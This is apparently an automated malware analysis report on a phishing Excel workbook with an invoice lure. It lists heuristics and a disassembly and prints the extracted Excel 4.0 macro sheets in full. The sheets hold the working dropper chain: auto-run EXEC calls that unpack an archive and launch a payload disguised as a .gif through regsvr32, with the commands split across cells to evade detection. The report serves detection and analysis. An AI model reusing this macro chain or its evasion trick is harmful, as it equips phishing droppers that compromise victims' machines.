Verdict: MALICIOUS (Risk Score: 330)
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
The sample is an Excel document containing Excel 4.0 macros, which are known to be used for malicious purposes. The document body contains a lure to 'enable editing and content mode for invoice calculation', indicating a social engineering attempt. The macros utilize dangerous functions like EXEC and GOTO, and references to LoadLibrary and GetProcAddress APIs suggest dynamic payload loading. The presence of hidden sheets and the Auto_Open defined name further support malicious intent.
Heuristics (9)
- Excel 4.0 macro sheet (3 sheet(s)) [critical; 2 related findings; OOXML_XLM_MACROSHEET]: Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
- Excel 4.0 Auto_Open defined name [critical; OOXML_XLM_AUTOOPEN_DEFINEDNAME]: Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
- Dangerous XLM formula APIs: GOTO, EXEC, HALT [critical; OOXML_XLM_DANGEROUS_FN]: Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
- PEB access via FS segment (x86) [high; SC_PEB_ACCESS]. Disassembly (attempted x86 opcode disassembly of the flagged bytes):

```text
0008946E 64a130000000 mov eax, dword ptr fs:[0x30]
00089474 894508       mov dword ptr [ebp + 8], eax
00089477 8b4d08       mov ecx, dword ptr [ebp + 8]
0008947A 8b5618       mov edx, dword ptr [esi + 0x18]
0008947D 895108       mov dword ptr [ecx + 8], edx
00089480 8b4e04       mov ecx, dword ptr [esi + 4]
00089483 8b4928       mov ecx, dword ptr [ecx + 0x28]
00089486 034e18       add ecx, dword ptr [esi + 0x18]
00089489 ffd1         call ecx
0008948B 6a00         push 0
0008948D ff563c       call dword ptr [esi + 0x3c]
00089490 33c0         xor eax, eax
00089492 40           inc eax
00089493 eb02         jmp 0x89497
00089495 33c0         xor eax, eax
00089497 5e           pop esi
00089498 c9           leave
00089499 c20400       ret 4
0008949C 55           push ebp
0008949D 8bec         mov ebp, esp
0008949F 51           push ecx
000894A0 8b423c       mov eax, dword ptr [edx + 0x3c]
000894A3 56           push esi
000894A4 8bf1         mov esi, ecx
000894A6 57           push edi
000894A7 8b441050     mov eax, dword ptr [eax + edx + 0x50]
000894AB 89460c       mov dword ptr [esi + 0xc], eax
000894AE b84d5a0000   mov eax, 0x5a4d
000894B3 895608       mov dword ptr [esi + 8], edx
000894B6 8916         mov dword ptr [esi], edx
000894B8 663902       cmp word ptr [edx], ax
000894BB 755c         jne 0x89519
000894BD 8b423c       mov eax, dword ptr [edx + 0x3c]
000894C0 bf50450000   mov edi, 0x4550
000894C5 03c2         add eax, edx
000894C7 894604       mov dword ptr [esi + 4], eax
000894CA 3938         cmp dword ptr [eax], edi
000894CC 754b         jne 0x89519
```

  The mov eax, dword ptr fs:[0x30] at the top reads the PEB pointer from the TEB. The second routine reads e_lfanew at [edx + 0x3c], compares the first word of the buffer against 0x5a4d ("MZ") and the dword at the NT header against 0x4550 ("PE"), and copies the field at NT header offset 0x50 (SizeOfImage for a PE32 optional header): the shape of code that parses a PE image in memory, consistent with the LoadLibrary and GetProcAddress references below.
- Reference to LoadLibrary API [high; SC_STR_LOADLIBRARY]
- Reference to GetProcAddress API [high; SC_STR_GETPROCADDRESS]
- Macro/content-enable lure [medium; SE_ENABLE_LURE]: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings.
- Hidden worksheet [low; OOXML_HIDDEN_SHEET]: Excel workbook contains 4 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
- Embedded URL [info; EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All nine URLs listed here are the standard OOXML/SpreadsheetML XML namespace identifiers declared on the root element of the extracted macro sheets, not attacker-controlled addresses, so they carry no indicator value on their own.
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2014/revision (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 (in document text: OOXML body / shared strings)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 1750 bytes | 16906c43ea71e7ceb95d2718eec32533a2cb6af3357ce8a6142e8a664da0db88 |
| xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 1804 bytes | e2fec034a628c75b94d784ea44c3bdf63c9845b3332fd933121ee06574678413 |
| xlm_sheet_02.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.xml | 2500 bytes | 87996b59ffebeefde3dcf4d7e31b5ec87828cc38534aa7743553950f90963dec |

Read together, the three previews (pretty-printed below; formula text unchanged) give the macro chain: sheet1 calls SAVE.COPY.AS on a path built from two shared strings that are not part of the preview, then GOTO(Nolaert!AK19); sheet2 concatenates the strings "tar -x", "f ..\" and "Nioka.meposv -C ..\" into one EXEC call, waits five seconds with WAIT(NOW()+"00:00:05") and jumps to Bkidydj!G5; sheet3 concatenates "Regs" and "vr32 -s ..\xl\media\image1.gif" into a second EXEC call and ends with HALT(). The Bkidydj!L15:L17 references in sheet2 resolve to the L15, L16 and L17 string cells shown in sheet3. Splitting each command across several cells so that no single cell holds "tar" or "regsvr32" is the T1140 deobfuscation listed above, and the regsvr32 argument points at a file stored in the package's media folder under a .gif name.

Preview of xlm_sheet_00.xml (first 1,000 lines of the extracted script):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
    xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
    mc:Ignorable="x14ac xr xr2 xr3 xr6"
    xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
    xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
    xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
    xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3"
    xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6"
    xr6:uid="{92BAA9A6-CCD7-4C96-B244-8027D75B3DA4}">
  <dimension ref="H22:I28"/>
  <sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
  <sheetFormatPr defaultColWidth="10.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="7" width="10.5703125" style="2"/>
    <col min="8" max="8" width="16.85546875" style="2" bestFit="1" customWidth="1"/>
    <col min="9" max="16384" width="10.5703125" style="2"/>
  </cols>
  <sheetData>
    <row r="22" spans="8:9" x14ac:dyDescent="0.25">
      <c r="I22" s="2" t="s"><v>2</v></c>
    </row>
    <row r="23" spans="8:9" x14ac:dyDescent="0.25">
      <c r="H23" s="2" t="b"><f>SAVE.COPY.AS(I22&I23)</f><v>0</v></c>
      <c r="I23" s="2" t="s"><v>1</v></c>
    </row>
    <row r="28" spans="8:9" x14ac:dyDescent="0.25">
      <c r="H28" s="2" t="e"><f>GOTO(Nolaert!AK19)</f><v>#N/A</v></c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
```

Preview of xlm_sheet_01.xml (first 1,000 lines of the extracted script):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
    xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
    mc:Ignorable="x14ac xr xr2 xr3 xr6"
    xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
    xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
    xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
    xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3"
    xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6"
    xr6:uid="{00000000-0001-0000-0200-000000000000}">
  <dimension ref="AK703:AK717"/>
  <sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
  <sheetFormatPr defaultColWidth="13.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="36" width="13.140625" style="2"/>
    <col min="37" max="37" width="37.42578125" style="2" bestFit="1" customWidth="1"/>
    <col min="38" max="16384" width="13.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="703" spans="37:37" x14ac:dyDescent="0.25">
      <c r="AK703" s="2" t="b"><f>EXEC(Bkidydj!L15&Bkidydj!L16&Bkidydj!L17)=NOW()=NOW()=NOW()</f><v>0</v></c>
    </row>
    <row r="706" spans="37:37" x14ac:dyDescent="0.25">
      <c r="AK706" s="2" t="b"><f>WAIT(NOW()+"00:00:05")</f><v>0</v></c>
    </row>
    <row r="717" spans="37:37" x14ac:dyDescent="0.25">
      <c r="AK717" s="2" t="e"><f>GOTO(Bkidydj!G5)</f><v>#N/A</v></c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
```

Preview of xlm_sheet_02.xml (first 1,000 lines of the extracted script):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
    xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
    mc:Ignorable="x14ac xr xr2 xr3 xr6"
    xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
    xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
    xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
    xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3"
    xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6"
    xr6:uid="{72FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}">
  <dimension ref="E14:L30"/>
  <sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="4" width="9.140625" style="2"/>
    <col min="5" max="5" width="27.5703125" style="2" customWidth="1"/>
    <col min="6" max="6" width="9.140625" style="2"/>
    <col min="7" max="7" width="13.28515625" style="2" bestFit="1" customWidth="1"/>
    <col min="8" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="14" spans="7:12" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="G14" s="2" t="b"><f>EXEC(E29&E30)</f><v>0</v></c>
    </row>
    <row r="15" spans="7:12" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="L15" s="2" t="str"><f>"tar -x"</f><v>tar -x</v></c>
    </row>
    <row r="16" spans="7:12" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="L16" s="2" t="str"><f>"f ..\"</f><v>f ..\</v></c>
    </row>
    <row r="17" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="L17" s="2" t="str"><f>"Nioka.meposv -C ..\"</f><v>Nioka.meposv -C ..\</v></c>
    </row>
    <row r="19" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="G19" s="2" t="b"><f>HALT()</f><v>0</v></c>
    </row>
    <row r="29" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="E29" s="2" t="str"><f>"Regs"</f><v>Regs</v></c>
    </row>
    <row r="30" spans="5:12" s="2" customFormat="1" x14ac:dyDescent="0.25">
      <c r="E30" s="2" t="str"><f>"vr32 -s ..\xl\media\image1.gif"</f><v>vr32 -s ..\xl\media\image1.gif</v></c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
```